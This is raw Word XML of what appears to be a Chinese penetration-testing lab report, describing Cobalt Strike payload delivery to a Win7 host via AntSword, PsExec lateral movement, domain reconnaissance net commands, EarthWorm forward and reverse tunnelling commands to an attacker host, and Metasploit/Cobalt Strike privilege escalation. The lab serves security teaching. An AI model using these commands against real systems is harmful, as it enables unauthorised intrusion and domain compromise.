          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEB9AC" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:firstLineChars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在cs中新建一个监听器，生成一个Windows.exe可执行文件，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在蚁剑中</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>放入win7中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F15FD8F" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:firstLineChars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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6B7EABD5" wp14:editId="7592FD17">
            <wp:extent cx="6635750" cy="4507230"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="28" name="图片 28" descr="屏幕截图 2024-08-21 10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4-08-21 10225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3D60" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2199"/>
        </w:tabs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/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PsExec64.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：允许在远程系统上执行进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16187155" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2199"/>
        </w:tabs>
        <w:ind w:left="482" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C07B1B" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2199"/>
        </w:tabs>
        <w:ind w:firstLineChars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上线即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3FA19C" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2199"/>
        </w:tabs>
        <w:ind w:left="482" w:firstLineChars="0" w:firstLine="0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cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="23045F28" wp14:editId="79C3487C">
            <wp:extent cx="10916285" cy="405765"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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rcRect l="1479" t="50290" r="-1572" b="18841"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1091628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27BF9B" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="482"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>五、实验总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE605F" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>thinkphp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用于在Exploit-DB 数据库中搜索与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ThinkPHP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相关的漏洞，这条命令会返回所有包含</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Thinkphp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>关键词的漏洞信息，包括漏洞的描述、路径等详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF3E5CB" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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横向渗透：攻击者获得内网某台积极的控制权，例如本实验中获得win7的权限，以该机器为跳板，通过收集域内凭证等方法，访问域内的其他机器，扩大攻击范围。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C368F3" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="482" w:firstLine="419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横向渗透步骤（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msf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探测）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E01B3" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="482" w:firstLine="838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IPC：实现进程间通信开放，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ipc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 xml:space="preserve">通过验证用户名和密码获得相应的权限，前提需要管理员开启默认共享。命令：net share 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ipc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$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B41E8C" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>域控渗透</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：利用漏洞或者工具攻击域控制器，获取域内的敏感信息或者权限，思路：通过</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>域成员</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>主机，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>定位出域控制器</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip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及管理员账号，利用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>域成员</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>主机作为跳板，扩大渗透范围</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A04B7A0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常用命令：ipconfig /all 查看本机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ip,all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表示查看所在域</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02055C01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Route print 打印路由信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A754E7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Net view 查看其他局域网内其他主机名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0870E0CA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Net share 查看开启了哪些共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C58B5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Net share c$ 开启c盘共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709401DA" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="002E6B12">
      <w:pPr>
        <w:ind w:left="482"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7917E9D3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lastRenderedPageBreak/>
        <w:t>Net user 查看本机用户列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25723792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Net user /domain 查看域用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CA8F84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Net group /domain 查看与里面的工作组，查看把用户分了多少组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF08CA0" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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内网穿透工具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ew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（全名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EarthWorm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）：可以正向连接和反向连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FAF83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运行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610D292D" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="482" w:firstLine="419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正向连接:在kali攻击机中./ew_for_linux64 -s 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lcx_tran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 xml:space="preserve"> -l 8888 -f 192.168.135.150 -g 3389，该命令意思是将目标服务器的3389端口转发到攻击机的8888端口，访问攻击机的8888端口就可以连接目标服务器的3389端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F19576" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="482" w:firstLine="419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反向连接：在kali攻击机中./ew_for_linux64 -s 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rcsocks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 xml:space="preserve"> -l 1008 -e 8888，该命令意思是将端口1008提出的请求转发到8888端口，在目标机器上输入ew_for_Win.exe -s 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rssocks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 xml:space="preserve"> 192.168.135.150 -e 8888,该命令意识是开启socks服务，访问192.168.135.150的8888端口就可以</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>跟目标</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>机器进行互通。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFFC235" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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在本次实验中我实在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msf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中使用的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PsExec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，故讲述在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msf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中的使用方法（在cs中也可以实现）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA4C24" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="482" w:firstLine="419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添加路由：run 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get_local_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>subnets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2FD7AF3C" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="482" w:firstLine="419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          Run autoroute -s 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ip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地址/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A6672" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="482" w:firstLine="419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          Run autoroute -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CE8C822" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="482" w:firstLine="419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加载模块：设置目标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ip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，账号，密码，payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595273FA" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="482" w:firstLine="419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最后执行就能成功获得域的session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3828EE" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>提权方法</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>提权的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方法有两种，一种是在kali中通过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msf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提权，另外一种是使用cs提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44871238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方法</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（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msf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提权）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD2CD6E" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="482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常用命令：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sysinfo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 xml:space="preserve"> 查看系统命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1FBBB2" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420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  Migrate 注入进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270611F" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420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  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Getuid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 xml:space="preserve"> 获取当前用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4ACAB6" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420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  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Getsystem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 xml:space="preserve"> 通过各种攻击向量来提升系统用户权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4F8A0D" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420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  Ps 列出进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526FD7B5" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420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  Sessions 查看会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B3236E" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420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方法二（cs提权）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E630349" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bypassuac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：将中级管理员权限提到高级管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5781D691" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr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>Elevate（最常用）：将任意用户的权限提升至系统权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B116AB8" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：将高级管理员权限提升至系统权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5637D9DA" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRPr="0058170B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058170B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002E6B12" w:rsidRPr="0058170B">
      <w:footerReference w:type="default" r:id="rId34"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="72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D698E7" w14:textId="77777777" w:rsidR="005E1536" w:rsidRDefault="005E1536">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="40BBCC28" w14:textId="77777777" w:rsidR="005E1536" w:rsidRDefault="005E15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96C1C" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRDefault="00000000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B8398D6" wp14:editId="128B1A7B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D839C79" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="a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8398D6" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="文本框 5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7D839C79" w14:textId="77777777" w:rsidR="002E6B12" w:rsidRDefault="00000000">
                    <w:pPr>
                      <w:pStyle w:val="a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8F67C4" w14:textId="77777777" w:rsidR="005E1536" w:rsidRDefault="005E1536">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5818C227" w14:textId="77777777" w:rsidR="005E1536" w:rsidRDefault="005E15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E9406"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="060E9406"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="922" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1362" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1802" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2242" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
